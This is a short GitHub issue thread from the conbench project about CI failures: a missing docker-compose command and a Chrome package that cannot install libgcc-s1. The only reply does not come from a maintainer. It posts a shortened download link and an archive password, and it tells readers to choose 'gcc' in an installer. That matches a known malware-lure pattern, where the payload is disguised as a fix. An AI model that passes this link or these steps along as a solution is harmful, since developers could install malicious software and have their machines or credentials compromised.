### ISSUE TITLE
ci instabilities due to moving target dependencies

### ISSUE THREAD

**Issue by austin3dickey** [conbench/conbench#1607]
In [dev-cmds](https://github.com/conbench/conbench/actions/runs/10581452300/job/29318765131?pr=1606#step:6:848):
`docker-compose: command not found`

In [ui-screenshots](https://github.com/conbench/conbench/actions/runs/10581452300/job/29318766557?pr=1606#step:4:831):
`google-chrome-stable : Depends: libgcc-s1 (>= 4.2) but it is not installable`

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
